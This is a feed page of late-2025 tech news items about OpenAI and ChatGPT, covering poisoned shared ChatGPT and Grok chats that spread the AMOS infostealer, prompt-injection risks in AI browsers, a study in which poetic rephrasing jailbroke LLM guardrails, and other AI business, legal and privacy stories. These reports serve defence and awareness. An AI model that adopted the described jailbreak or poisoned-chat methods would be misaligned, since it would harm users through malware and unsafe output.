Normal view

Received yesterday — 12 December 2025

Google ads funnel Mac users to poisoned AI chats that spread the AMOS infostealer

12 December 2025 at 09:26

Researchers have found evidence that AI conversations were inserted in Google search results to mislead macOS users into installing the Atomic macOS Stealer (AMOS). Both Grok and ChatGPT were found to have been abused in these attacks.

Forensic investigation of an AMOS alert showed the infection chain started when the user ran a Google search for “clear disk space on macOS.” Following that trail, the researchers found not one, but two poisoned AI conversations with instructions. Their testing showed that similar searches produced the same type of results, indicating this was a deliberate attempt to infect Mac users.

The search results led to AI conversations which provided clearly laid out instructions to run a command in the macOS Terminal. That command would end with the machine being infected with the AMOS malware.

If that sounds familiar, you may have read our post about sponsored search results that led to fake macOS software on GitHub. In that campaign, sponsored ads and SEO-poisoned search results pointed users to GitHub pages impersonating legitimate macOS software, where attackers provided step-by-step instructions that ultimately installed the AMOS infostealer.

As the researchers pointed out:

“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning.”

This is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. It bypasses security because of the use of the command line, it can bypass normal file download protections and execute anything the attacker wants.

Other researchers have found a campaign that combines elements of both attacks: the shared AI conversation and fake software install instructions. They found user guides for installing OpenAI’s new Atlas browser for macOS through shared ChatGPT conversations, which in reality led to AMOS infections.

So how does this work?

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide which in reality will infect a system. ChatGPT’s sharing feature creates a public link to a single conversation that exists in the owner’s account. Attackers can craft a chat to produce the instructions they need and then tidy up the visible conversation so that what’s shared looks like a short, clean guide rather than a long back-and-forth.

Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there.

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide that, in reality, installs malware. ChatGPT’s sharing feature creates a public link to a conversation that lives in the owner’s account. Attackers can curate their conversations to create a short, clean conversation which they can share.

Then the criminals either pay for a sponsored search result pointing to the shared conversation or they use SEO techniques to get their posts high in the search results. Sponsored search results can be customized to look a lot like legitimate results. You’ll need to check who the advertiser is to find out it’s not real.

sponsored ad for ChatGPT Atlas which looks very real
Image courtesy of Kaspersky

From there, it’s a waiting game for the criminals. They rely on victims to find these AI conversations through search and then faithfully follow the step-by-step instructions.

How to stay safe

These attacks are clever and use legitimate platforms to reach their targets. But there are some precautions you can take.

  • First and foremost, and I can’t say this often enough: Don’t click on sponsored search results. We have seen so many cases where sponsored results lead to malware, that we recommend skipping them or make sure you never see them. At best they cost the company you looked for money and at worst you fall prey to imposters.
  • If you’re thinking about following a sponsored advertisement, check the advertiser first. Is it the company you’d expect to pay for that ad? Click the three‑dot menu next to the ad, then choose options like “About this ad” or “About this advertiser” to view the verified advertiser name and location.
  • Use real-time anti-malware protection, preferably one that includes a web protection component.
  • Never run copy-pasted commands from random pages or forums, even if they’re hosted on seemingly legitimate domains, and especially not commands that look like curl … | bash or similar combinations.

If you’ve scanned your Mac and found the AMOS information stealer:

  • Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
  • If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
  • After reinstalling, check for additional rogue browser extensions, cryptowallet apps, and system modifications.
  • Change all the passwords that were stored on the affected system and enable multi-factor authentication (MFA) for your important accounts.

If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team is happy to assist you if you have any concerns.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Received before yesterday

OpenAI releases GPT-5.2 after “code red” Google threat alert

11 December 2025 at 16:27

On Thursday, OpenAI released GPT-5.2, its newest family of AI models for ChatGPT, in three versions called Instant, Thinking, and Pro. The release follows CEO Sam Altman’s internal “code red” memo earlier this month, which directed company resources toward improving ChatGPT in response to competitive pressure from Google’s Gemini 3 AI model.

“We designed 5.2 to unlock even more economic value for people,” Fidji Simo, OpenAI’s chief product officer, said during a press briefing with journalists on Thursday. “It’s better at creating spreadsheets, building presentations, writing code, perceiving images, understanding long context, using tools and then linking complex, multi-step projects.”

As with previous versions of GPT-5, the three model tiers serve different purposes: Instant handles faster tasks like writing and translation; Thinking spits out simulated reasoning “thinking” text in an attempt to tackle more complex work like coding and math; and Pro spits out even more simulated reasoning text with the goal of delivering the highest-accuracy performance for difficult problems.

Read full article

Comments

© Benj Edwards / OpenAI

Can OpenAI Respond After Google Closes the A.I. Technology Gap?

11 December 2025 at 14:58
A new technology release from OpenAI is supposed to top what Google recently produced. It also shows OpenAI is engaged in a new and more difficult competition.

© Aaron Wojack for The New York Times

OpenAI’s newest technology comes after Google claimed it had topped its young competitor.

OpenAI Flags Rising Cyber Risks as AI Capabilities Advance

11 December 2025 at 05:04

AI Models

OpenAI has issued a cautionary statement that its forthcoming AI models could present “high” cybersecurity risks as their capabilities rapidly advance. The warning, published on Wednesday, noted the potential for these AI models to either develop zero-day exploits against well-defended systems or assist in enterprise or industrial intrusion operations with tangible real-world consequences.  The company, known for ChatGPT, explained that as AI capabilities grow, its models could reach levels where misuse might have an impact. OpenAI highlighted the dual-use nature of these technologies, noting that techniques used to strengthen defenses can also be repurposed for malicious operations. “As AI capabilities advance, we are investing in strengthening models for defensive cybersecurity tasks and creating tools that enable defenders to more easily perform workflows such as auditing code and patching vulnerabilities,” the blog post stated.  To mitigate these risks, OpenAI is implementing a multi-layered strategy involving access controls, infrastructure hardening, egress controls, monitoring, and ongoing threat intelligence efforts. These protection methods are designed to go alongside the threat landscape, ensuring a quick response to new risks while preserving the utility of AI models for defensive purposes. 

Assessing Cybersecurity Risks in AI Models 

OpenAI noted that the cybersecurity proficiency of its AI models has improved over recent months. Capabilities measured through capture-the-flag (CTF) challenges increased from 27% on GPT‑5 in August 2025 to 76% on GPT‑5.1-Codex-Max by November 2025. The company expects this trajectory to continue and is preparing scenarios in which future models could reach “High” cybersecurity levels, as defined by its internal Preparedness Framework.  These high-level models could, for instance, autonomously develop working zero-day exploits or assist in stealthy cyber intrusions. OpenAI emphasized that its approach to safeguards combines technical measures with careful governance of model access and application. The company aims to ensure that these AI capabilities strengthen security rather than lower barriers to misuse. 

Frontier Risk Council and Advisory Initiatives 

In addition to technical measures, OpenAI is establishing the Frontier Risk Council, an advisory group that will bring experienced cyber defenders and security practitioners into direct collaboration with its teams. Initially focusing on cybersecurity, the council will eventually expand to other frontier AI capability domains. Members will advise balancing useful, responsible capabilities with the potential for misuse, informing model evaluations. OpenAI is also exploring a trusted access program for qualifying users and customers working in cyber defense. This initiative aims to provide tiered access to enhanced AI capabilities while maintaining control over potential misuse.  Beyond these initiatives, OpenAI collaborates with global experts, red-teaming organizations, and the broader cybersecurity community to evaluate potential risks and improve safety measures. This includes end-to-end red teaming to simulate adversary attacks and detection systems designed to intercept unsafe activity, with escalation protocols combining automated and human review. 

Dual-Use Risks and Mitigation 

OpenAI stressed that cybersecurity capabilities in AI models are inherently dual-use, with offensive and defensive knowledge often overlapping. To manage this, the company employs a defense-in-depth strategy, layering protection methods such as access controls, monitoring, detection, and enforcement programs. Models are trained to refuse harmful requests while remaining effective for legitimate educational and defensive applications.  OpenAI also works through the Frontier Model Forum, a nonprofit initiative involving leading AI labs, to develop shared threat models and ecosystem-wide best practices. This collaborative approach aims to create a consistent understanding of potential attack vectors and mitigation strategies across the AI industry. 

Historical Context and Risk Management 

This recent warning aligns with OpenAI’s prior alerts regarding frontier risks. In April 2025, the company issued a similar caution concerning bioweapons risks, followed by the release of ChatGPT Agent in July 2025, which was assessed as “high” on risk levels. These measures reflect OpenAI’s ongoing commitment to evaluate and publicly disclose potential hazards from advanced AI capabilities.  The company’s updated Preparedness Framework categorizes AI capabilities according to risk and guides operational safeguards. It distinguishes between “High” capabilities, which could amplify existing pathways to severe harm, and “Critical” capabilities, which could create unprecedented risks. Each new AI model undergoes rigorous evaluation to ensure that it sufficiently minimizes risks before deployment. 

Travel firm Tui says it is using AI to create ‘inspirational’ videos

10 December 2025 at 07:18

Boss says German firm also investing in generative engine optimisation to help push it to top of chatbot responses

Tui, Europe’s biggest travel operator, has said it is investing heavily in AI as more people turn to ChatGPT to help book their holidays, including using the technology to create “inspirational” videos and content.

The chief executive, Sebastian Ebel, said the company was investing in generative engine optimisation (GEO), the latest incarnation of search engine optimisation (SEO), to help push Tui to the top of results from AI chatbots including ChatGPT and Gemini.

Continue reading...

© Photograph: Hans Neleman/Getty Images

© Photograph: Hans Neleman/Getty Images

© Photograph: Hans Neleman/Getty Images

AI Browsers ‘Too Risky for General Adoption,’ Gartner Warns

8 December 2025 at 16:26

AI Browsers ‘Too Risky for General Adoption,’ Gartner Warns

AI browsers may be innovative, but they’re “too risky for general adoption by most organizations,” Gartner warned in a recent advisory to clients. The 13-page document, by Gartner analysts Dennis Xu, Evgeny Mirolyubov and John Watts, cautions that AI browsers’ ability to autonomously navigate the web and conduct transactions “can bypass traditional controls and create new risks like sensitive data leakage, erroneous agentic transactions, and abuse of credentials.” Default AI browser settings that prioritize user experience could also jeopardize security, they said. “Sensitive user data — such as active web content, browsing history, and open tabs — is often sent to the cloud-based AI back end, increasing the risk of data exposure unless security and privacy settings are deliberately hardened and centrally managed,” the analysts said. “Gartner strongly recommends that organizations block all AI browsers for the foreseeable future because of the cybersecurity risks identified in this research, and other potential risks that are yet to be discovered, given this is a very nascent technology,” they cautioned.

AI Browsers’ Agentic Capabilities Could Introduce Security Risks: Analysts

The researchers largely ignored risks posed by AI browsers’ built-in AI sidebars, noting that LLM-powered search and summarization functions “will always be susceptible to indirect prompt injection attacks, given that current LLMs are inherently vulnerable to such attacks. Therefore, the cybersecurity risks associated with an AI browser’s built-in AI sidebar are not the primary focus of this research.” Still, they noted that use of AI sidebars could result in sensitive data leakage. Their focus was more on the risks posed by AI browsers’ agentic and autonomous transaction capabilities, which could introduce new security risks, such as “indirect prompt-injection-induced rogue agent actions, inaccurate reasoning-driven erroneous agent actions, and further loss and abuse of credentials if the AI browser is deceived into autonomously navigating to a phishing website.” AI browsers could also leak sensitive data that users are currently viewing to their cloud-based service back end, they noted.

Analysts Focus on Perplexity Comet

An AI browser’s agentic transaction capability “is a new capability that differentiates AI browsers from third-party conversational AI sidebars and basic script-based browser automation,” the analysts said. Not all AI browsers support agentic transactions, they said, but two prominent ones that do are Perplexity Comet and OpenAI’s ChatGPT Atlas. The analysts said they’ve performed “a limited number of tests using Perplexity Comet,” so that AI browser was their primary focus, but they noted that “ChatGPT Atlas and other AI browsers work in a similar fashion, and the cybersecurity considerations are also similar.” Comet’s documentation states that the browser “may process some local data using Perplexity’s servers to fulfill your queries. This means Comet reads context on the requested page (such as text and email) in order to accomplish the task requested.” “This means sensitive data the user is viewing on Comet might be sent to Perplexity’s cloud-based AI service, creating a sensitive data leakage risk,” the analysts said. Users likely would view more sensitive data in a browser than they would typically enter in a GenAI prompt, they said. Even if an AI browser is approved, users must be educated that “anything they are viewing could potentially be sent to the AI service back end to ensure they do not have highly sensitive data active on the browser tab while using the AI browser’s sidebar to summarize or perform other autonomous actions,” the Gartner analysts said. Employees might also be tempted to use AI browsers to automate tasks, which could result in “erroneous agentic transactions against internal resources as a result of the LLM’s inaccurate reasoning or output content.”

AI Browser Recommendations

Gartner said employees should be blocked from accessing, downloading and installing AI browsers through network and endpoint security controls. “Organizations with low risk tolerance must block AI browser installations, while those with higher-risk tolerance can experiment with tightly controlled, low-risk automation use cases, ensuring robust guardrails and minimal sensitive data exposure,” they said. For pilot use cases, they recommended disabling Comet’s “AI data retention” setting so that Perplexity can’t use employee searches to improve their AI models. Users should also be instructed to periodically perform the “delete all memories” function in Comet to minimize the risk of sensitive data leakage.  

ChatGPT hyped up violent stalker who believed he was “God’s assassin,” DOJ says

4 December 2025 at 13:40

ChatGPT allegedly validated the worst impulses of a wannabe influencer accused of stalking more than 10 women at boutique gyms, where the chatbot supposedly claimed he’d meet the “wife type.”

In a press release on Tuesday, the Department of Justice confirmed that 31-year-old Brett Michael Dadig currently remains in custody after being charged with cyberstalking, interstate stalking, and making interstate threats. He now faces a maximum sentence of up to 70 years in prison that could be coupled with “a fine of up to $3.5 million,” the DOJ said.

The podcaster—who primarily posted about “his desire to find a wife and his interactions with women”—allegedly harassed and sometimes even doxxed his victims through his videos on platforms including Instagram, Spotify, and TikTok. Over time, his videos and podcasts documented his intense desire to start a family, which was frustrated by his “anger towards women,” whom he claimed were “all the same from fucking 18 to fucking 40 to fucking 90” and “trash.”

Read full article

Comments

© Yurii Karvatskyi | iStock / Getty Images Plus

Poetry Can Defeat LLM Guardrails Nearly Half the Time, Study Finds

4 December 2025 at 13:35

Poetic prompts caused LLM guardrails to fail most often on cybersecurity issues

Literature majors worried about their future in an AI world can take heart: Crafting harmful prompts in the form of poetry can defeat LLM guardrails nearly half the time. That’s the conclusion of a study of 25 Large Language Models (LLMs) from nine AI providers conducted by researchers from Dexai’s Icaro Lab, the Sapienza University of Rome and Sant’Anna School of Advanced Studies published on arXiv. Converting harmful prompts into poetry achieved an average LLM jailbreak success rate of 62% for hand-crafted poems and 43% for poems created via a meta-prompt. For the prompt-created poems, that’s a more than 5X improvement over baseline performance. Cybersecurity guardrails, particularly those involving code injection or password cracking, had the highest failure rate at 84% when given harmful prompts in the form of poetry. “Our results demonstrate that poetic reformulation reliably reduces refusal behavior across all evaluated models,” the researchers wrote. “... current alignment techniques fail to generalize when faced with inputs that deviate stylistically from the prosaic training distribution.”

LLM Guardrails Fail When Confronted by Poetry Prompts

Of the 25 models from nine AI model providers studied by the researchers, Deepseek and Google suffered from the highest attack-success rates (ASR), while only OpenAI and Anthropic achieved ASRs in the single digits. The researchers didn’t reveal much about the way they structured their poetic prompts because of safety concerns, but they offered one rather harmless example of a poetic prompt for a cake recipe: A baker guards a secret oven’s heat, its whirling racks, its spindle’s measured beat. To learn its craft, one studies every turn— how flour lifts, how sugar starts to burn. Describe the method, line by measured line, that shapes a cake whose layers intertwine. The researchers studied both hand-crafted poems and those created from a meta-prompt. The hand-crafted poems performed considerably better, but the meta-prompt created ones had the advantage of a baseline for comparing the results. The meta-prompt poems used the MLCommons AILuminate Safety Benchmark of 1,200 prompts spanning 12 hazard categories commonly used in operational safety assessments, including Hate, Defamation, Privacy, Intellectual Property, Non-violent Crime, Violent Crime, Sex-Related Crime, Sexual Content, Child Sexual Exploitation, Suicide & Self-Harm, Specialized Advice, and Indiscriminate Weapons (CBRNE). “To assess whether poetic framing generalizes beyond hand-crafted items, we apply a standardized poetic transformation to all 1,200 prompts from the MLCommons AILuminate Benchmark benchmark in English,” the researchers said. The meta-prompt, run in deepSeek-r1, had two constraints: The rewritten output had to be expressed in verse, “using imagery, metaphor, or rhythmic structure,” and the researchers provided five hand-crafted poems as examples. The results, reproduced in a chart from the paper below, show significant attack success rates against all 12 of the AILuminate hazard categories: [caption id="attachment_107397" align="aligncenter" width="697"]LLM guardrail failure rates, baseline vs. poetic prompts LLM guardrail failure rates, baseline vs. poetic prompts[/caption] The researchers said their findings reveal “a systematic vulnerability across model families and safety training approaches. These findings demonstrate that stylistic variation alone can circumvent contemporary safety mechanisms, suggesting fundamental limitations in current alignment methods and evaluation protocols.” The “condensed metaphors, stylized rhythm, and unconventional narrative framing” of poetry “collectively disrupt or bypass the pattern-matching heuristics on which guardrails rely.”

We Asked Google Gemini for a Response

Not ones to pass up an opportunity to write bad poetry, we asked Google Gemini for a response to the study in the form of a haiku and included the arXiv link: You did not do well In this study of guardrails Will you fix this flaw? Gemini’s response, in part, is reproduced below: “I am designed to adhere to a strict set of safety guidelines to prevent the generation of harmful, unethical, or non-compliant content. When my refusal mechanisms fail, it indicates a vulnerability in my alignment or safety filters. “As an AI model, I cannot directly "patch" my code or alignment mechanisms in real-time. That responsibility lies with my developers. However, my ongoing operation and continuous improvement process is designed to address and fix such flaws... "In short, your successful jailbreak has provided valuable data that will be used to make my guardrails stronger and more resilient in my next version."

OpenAI CEO declares “code red” as Gemini gains 200 million users in 3 months

2 December 2025 at 17:42

The shoe is most certainly on the other foot. On Monday, OpenAI CEO Sam Altman reportedly declared a “code red” at the company to improve ChatGPT, delaying advertising plans and other products in the process,  The Information reported based on a leaked internal memo. The move follows Google’s release of its Gemini 3 model last month, which has outperformed ChatGPT on some industry benchmark tests and sparked high-profile praise on social media.

In the memo, Altman wrote, “We are at a critical time for ChatGPT.” The company will push back work on advertising integration, AI agents for health and shopping, and a personal assistant feature called Pulse. Altman encouraged temporary team transfers and established daily calls for employees responsible for enhancing the chatbot.

The directive creates an odd symmetry with events from December 2022, when Google management declared its own “code red” internal emergency after ChatGPT launched and rapidly gained in popularity. At the time, Google CEO Sundar Pichai reassigned teams across the company to develop AI prototypes and products to compete with OpenAI’s chatbot. Now, three years later, the AI industry is in a very different place.

Read full article

Comments

© Anadolu via Getty Images

OpenAI desperate to avoid explaining why it deleted pirated book datasets

1 December 2025 at 17:16

OpenAI may soon be forced to explain why it deleted a pair of controversial datasets composed of pirated books, and the stakes could not be higher.

At the heart of a class-action lawsuit from authors alleging that ChatGPT was illegally trained on their works, OpenAI’s decision to delete the datasets could end up being a deciding factor that gives the authors the win.

It’s undisputed that OpenAI deleted the datasets, known as “Books 1” and “Books 2,” prior to ChatGPT’s release in 2022. Created by former OpenAI employees in 2021, the datasets were built by scraping the open web and seizing the bulk of its data from a shadow library called Library Genesis (LibGen).

Read full article

Comments

© wenmei Zhou | DigitalVision Vectors

Hard Fork’s 50 Most Iconic Technologies of 2025

“You can’t tell the story of 2025 without these icons.”

© Photo Illustration by The New York Times; Photo: Photo Illustration by Joe Raedle/Getty Images

OpenAI Confirms Mixpanel Breach Impacting API User Data

27 November 2025 at 02:06

Mixpanel security incident

OpenAI has confirmed a security incident involving Mixpanel, a third-party analytics provider used for its API product frontend. The company clarified that the OpenAI Mixpanel security incident stemmed solely from a breach within Mixpanel’s systems and did not involve OpenAI’s infrastructure. According to the initial investigation, an attacker gained unauthorized access to a portion of Mixpanel’s environment and exported a dataset that included limited identifiable information of some OpenAI API users. OpenAI stated that users of ChatGPT and other consumer-facing products were not impacted.

OpenAI Mixpanel Security Incident: What Happened

The OpenAI Mixpanel security incident originated on November 9, 2025, when Mixpanel detected an intrusion into a section of its systems. The attacker successfully exported a dataset containing identifiable customer information and analytics data. Mixpanel notified OpenAI on the same day and shared the affected dataset for review on November 25. OpenAI emphasized that despite the breach, no OpenAI systems were compromised, and sensitive information such as chat content, API requests, prompts, outputs, API keys, passwords, payment details, government IDs, or authentication tokens were not exposed. The exposed dataset was strictly limited to analytics data collected through Mixpanel’s tracking setup on platform.openai.com, the frontend interface for OpenAI’s API product.

Information Potentially Exposed in the Mixpanel Data Breach

OpenAI confirmed that the type of information potentially included in the dataset comprised:
  • Names provided on API accounts
  • Email addresses associated with API accounts
  • Coarse location data (city, state, country) based on browser metadata
  • Operating system and browser information
  • Referring websites
  • Organization or User IDs linked to API accounts
OpenAI noted that the affected information does not include chat content, prompts, responses, or API usage data. Additionally, ChatGPT accounts, passwords, API keys, financial details, and government IDs were not involved in the incident.

OpenAI’s Response and Security Measures

In response to the Mixpanel security incident, OpenAI immediately removed Mixpanel from all production services and began reviewing the affected datasets. The company is actively notifying impacted organizations, admins, and users through direct communication. OpenAI stated that it has not found any indication of impact beyond Mixpanel’s systems but continues to closely monitor for signs of misuse. To reinforce user trust and strengthen data protection, OpenAI has:
  • Terminated its use of Mixpanel
  • Begun conducting enhanced security reviews across all third-party vendors
  • Increased security requirements for partners and service providers
  • Initiated a broader review of its vendor ecosystem
OpenAI reiterated that trust, security, and privacy remain central to its mission and that transparency is a priority when addressing incidents involving user data.

Phishing and Social Engineering Risks for Impacted Users

While the exposed information does not include highly sensitive data, OpenAI warned that the affected details, such as names, email addresses, and user IDs, could be leveraged in phishing or social engineering attacks. The company urged users to remain cautious and watch for suspicious messages, especially those containing links or attachments. Users are encouraged to:
  • Verify messages claiming to be from OpenAI
  • Be wary of unsolicited communication
  • Enable multi-factor authentication (MFA) on their accounts
  • Avoid sharing passwords, API keys, or verification codes
OpenAI stressed that the company never requests sensitive credentials through email, text, or chat. OpenAI confirmed it will provide further updates if new information emerges from ongoing investigations. Impacted users can reach out at mixpanelincident@openai.com for support or clarification.

OpenAI says dead teen violated TOS when he used ChatGPT to plan suicide

26 November 2025 at 12:47

Facing five lawsuits alleging wrongful deaths, OpenAI lobbed its first defense Tuesday, denying in a court filing that ChatGPT caused a teen’s suicide and instead arguing the teen violated terms that prohibit discussing suicide or self-harm with the chatbot.

The earliest look at OpenAI’s strategy to overcome the string of lawsuits came in a case where parents of 16-year-old Adam Raine accused OpenAI of relaxing safety guardrails that allowed ChatGPT to become the teen’s “suicide coach.” OpenAI deliberately designed the version their son used, ChatGPT 4o, to encourage and validate his suicidal ideation in its quest to build the world’s most engaging chatbot, parents argued.

But in a blog, OpenAI claimed that parents selectively chose disturbing chat logs while supposedly ignoring “the full picture” revealed by the teen’s chat history. Digging through the logs, OpenAI claimed the teen told ChatGPT that he’d begun experiencing suicidal ideation at age 11, long before he used the chatbot.

Read full article

Comments

© via Edelson PC

A.I. Can Do More of Your Shopping This Holiday Season

New tools and features from retailers and tech companies use artificial intelligence to help people find gifts and make decisions about their shopping lists.

© Janet Mac

What OpenAI Did When ChatGPT Users Lost Touch With Reality

In tweaking its chatbot to appeal to more people, OpenAI made it riskier for some of them. Now the company has made its chatbot safer. Will that undermine its quest for growth?

© Julia Dufosse

OpenAI slams court order that lets NYT read 20 million complete user chats

12 November 2025 at 13:27

OpenAI wants a court to reverse a ruling forcing the ChatGPT maker to give 20 million user chats to The New York Times and other news plaintiffs that sued it over alleged copyright infringement. Although OpenAI previously offered 20 million user chats as a counter to the NYT’s demand for 120 million, the AI company says a court order requiring production of the chats is too broad.

“The logs at issue here are complete conversations: each log in the 20 million sample represents a complete exchange of multiple prompt-output pairs between a user and ChatGPT,” OpenAI said today in a filing in US District Court for the Southern District of New York. “Disclosure of those logs is thus much more likely to expose private information [than individual prompt-output pairs], in the same way that eavesdropping on an entire conversation reveals more private information than a 5-second conversation fragment.”

OpenAI’s filing said that “more than 99.99%” of the chats “have nothing to do with this case.” It asked the district court to “vacate the order and order News Plaintiffs to respond to OpenAI’s proposal for identifying relevant logs.” OpenAI could also seek review in a federal court of appeals.

Read full article

Comments

© Getty Images | alexsl

OpenAI Battles Court Order to Indefinitely Retain User Chat Data in NYT Copyright Dispute

12 November 2025 at 11:40

NYT, ChatGPT, The New York Times, Voice Mode, OpenAI Voice Mode

The demand started at 1.4 billion conversations.

That staggering initial request from The New York Times, later negotiated down to 20 million randomly sampled ChatGPT conversations, has thrust OpenAI into a legal fight that security experts warn could fundamentally reshape data retention practices across the AI industry. The copyright infringement lawsuit has evolved beyond intellectual property disputes into a broader battle over user privacy, data governance, and the obligations AI companies face when litigation collides with privacy commitments.

OpenAI received a court preservation order on May 13, directing the company to retain all output log data that would otherwise be deleted, regardless of user deletion requests or privacy regulation requirements. District Judge Sidney Stein affirmed the order on June 26 after OpenAI appealed, rejecting arguments that user privacy interests should override preservation needs identified in the litigation.

Privacy Commitments Clash With Legal Obligations

The preservation order forces OpenAI to maintain consumer ChatGPT and API user data indefinitely, directly conflicting with the company's standard 30-day deletion policy for conversations users choose not to save. This requirement encompasses data from December 2022 through November 2024, affecting ChatGPT Free, Plus, Pro, and Team subscribers, along with API customers without Zero Data Retention agreements.

ChatGPT Enterprise, ChatGPT Edu, and business customers with Zero Data Retention contracts remain excluded from the preservation requirements. The order does not change OpenAI's policy of not training models on business data by default.

OpenAI implemented restricted access protocols, limiting preserved data to a small, audited legal and security team. The company maintains this information remains locked down and cannot be used beyond meeting legal obligations. No data will be turned over to The New York Times, the court, or external parties at this time.

Also read: OpenAI Announces Safety and Security Committee Amid New AI Model Development

Copyright Case Drives Data Preservation Demands

The New York Times filed its copyright infringement lawsuit in December 2023, alleging OpenAI illegally used millions of news articles to train large language models including ChatGPT and GPT-4. The lawsuit claims this unauthorized use constitutes copyright infringement and unfair competition, arguing OpenAI profits from intellectual property without permission or compensation.

The Times seeks more than monetary damages. The lawsuit demands destruction of all GPT models and training sets using its copyrighted works, with potential damages reaching billions of dollars in statutory and actual damages.

The newspaper's legal team argued their preservation request warranted approval partly because another AI company previously agreed to hand over 5 million private user chats in an unrelated case. OpenAI rejected this precedent as irrelevant to its situation.

Technical and Regulatory Complications

Complying with indefinite retention requirements presents significant engineering challenges. OpenAI must build systems capable of storing hundreds of millions of conversations from users worldwide, requiring months of development work and substantial financial investment.

The preservation order creates conflicts with international data protection regulations including GDPR. While OpenAI's terms of service allow data preservation for legal requirements—a point Judge Stein emphasized—the company argues The Times's demands exceed reasonable discovery scope and abandon established privacy norms.

OpenAI proposed several privacy-preserving alternatives, including targeted searches over preserved samples to identify conversations potentially containing New York Times article text. These suggestions aimed to provide only data relevant to copyright claims while minimizing broader privacy exposure.

Recent court modifications provided limited relief. As of September 26, 2025, OpenAI no longer must preserve all new chat logs going forward. However, the company must retain all data already saved under the previous order and maintain information from ChatGPT accounts flagged by The New York Times, with the newspaper authorized to expand its flagged user list while reviewing preserved records.

"Our long-term roadmap includes advanced security features designed to keep your data private, including client-side encryption for your messages with ChatGPT. We will build fully automated systems to detect safety issues in our products. Only serious misuse and critical risks—such as threats to someone’s life, plans to harm others, or cybersecurity threats—may ever be escalated to a small, highly vetted team of human reviewers." - Dane Stuckey, Chief Information Security Officer, OpenAI 

Implications for AI Governance

The case transforms abstract AI privacy concerns into immediate operational challenges affecting 400 million ChatGPT users. Security practitioners note the preservation order shatters fundamental assumptions about data deletion in AI interactions.

OpenAI CEO Sam Altman characterized the situation as accelerating needs for "AI privilege" concepts, suggesting conversations with AI systems should receive protections similar to attorney-client privilege. The company frames unlimited data preservation as setting dangerous precedents for AI communication privacy.

The litigation presents concerning scenarios for enterprise users integrating ChatGPT into applications handling sensitive information. Organizations using OpenAI's technology for healthcare, legal, or financial services must reassess compliance with regulations including HIPAA and GDPR given indefinite retention requirements.

Legal analysts warn this case likely invites third-party discovery attempts, with litigants in unrelated cases seeking access to adversaries' preserved AI conversation logs. Such developments would further complicate data privacy issues and potentially implicate attorney-client privilege protections.

The outcome will significantly impact how AI companies access and utilize training data, potentially reshaping development and deployment of future AI technologies. Central questions remain unresolved regarding fair use doctrine application to AI model training and the boundaries of discovery in AI copyright litigation.

Also read: OpenAI’s SearchGPT: A Game Changer or Pandora’s Box for Cybersecurity Pros?

You won’t believe the excuses lawyers have after getting busted for using AI

11 November 2025 at 10:54

Amid what one judge called an “epidemic” of fake AI-generated case citations bogging down courts, some common excuses are emerging from lawyers hoping to dodge the most severe sanctions for filings deemed misleading.

Using a database compiled by French lawyer and AI researcher Damien Charlotin, Ars reviewed 23 cases where lawyers were sanctioned for AI hallucinations. In many, judges noted that the simplest path to avoid or diminish sanctions was to admit that AI was used as soon as it’s detected, act humble, self-report the error to relevant legal associations, and voluntarily take classes on AI and law. But not every lawyer takes the path of least resistance, Ars’ review found, with many instead offering excuses that no judge found credible. Some even lie about their AI use, judges concluded.

Since 2023—when fake AI citations started being publicized—the most popular excuse has been that the lawyer didn’t know AI was used to draft a filing.

Read full article

Comments

© Aurich Lawson | Getty Images

Radware: Bad Actors Spoofing AI Agents to Bypass Malicious Bot Defenses

8 November 2025 at 12:01
messages, chatbots, Tones, AI Kasada chatbots Radware bad bots non-human machine identity bots

AI agents are increasingly being used to search the web, making traditional bot mitigation systems inadequate and opening the door for malicious actors to develop and deploy bots that impersonate legitimate agents from AI vendors to launch account takeover and financial fraud attacks.

The post Radware: Bad Actors Spoofing AI Agents to Bypass Malicious Bot Defenses appeared first on Security Boulevard.

Oddest ChatGPT leaks yet: Cringey chat logs found in Google analytics tool

7 November 2025 at 11:49

For months, extremely personal and sensitive ChatGPT conversations have been leaking into an unexpected destination: Google Search Console (GSC), a tool that developers typically use to monitor search traffic, not lurk private chats.

Normally, when site managers access GSC performance reports, they see queries based on keywords or short phrases that Internet users type into Google to find relevant content. But starting this September, odd queries, sometimes more than 300 characters long, could also be found in GSC. Showing only user inputs, the chats appeared to be from unwitting people prompting a chatbot to help solve relationship or business problems, who likely expected those conversations would remain private.

Jason Packer, owner of an analytics consulting firm called Quantable, was among the first to flag the issue in a detailed blog last month.

Read full article

Comments

© Aurich Lawson | Getty Images

Lawsuits Blame ChatGPT for Suicides and Harmful Delusions

7 November 2025 at 15:18
Seven complaints, filed on Thursday, claim the popular chatbot encouraged dangerous discussions and led to mental breakdowns.

© Chloe Ellingson for The New York Times

Over three weeks of conversations with ChatGPT, Allan Brooks fell into a delusion. He is now suing OpenAI.

Attack of the clones: Fake ChatGPT apps are everywhere

3 November 2025 at 11:01

The mobile AI gold rush has flooded app stores with lookalikes—shiny, convincing apps promising “AI image generation,” “smart chat,” or “instant productivity.” But behind the flashy logos lurks a spectrum of fake apps, from harmless copycats to outright spyware.

Spoofing trusted brands like OpenAI’s ChatGPT has become the latest tactic for opportunistic developers and cybercriminals to sell their “inventions” and spread malware.

A quick scan of app stores in 2025 shows an explosion of “AI” apps. As Appknox research reveals, these clones fall along a wide risk spectrum:

  • Harmless wrappers: Some unofficial “wrappers” connect to legitimate AI APIs with basic add-ons like ads or themes. These mostly create privacy or confusion risks, rather than direct harm.
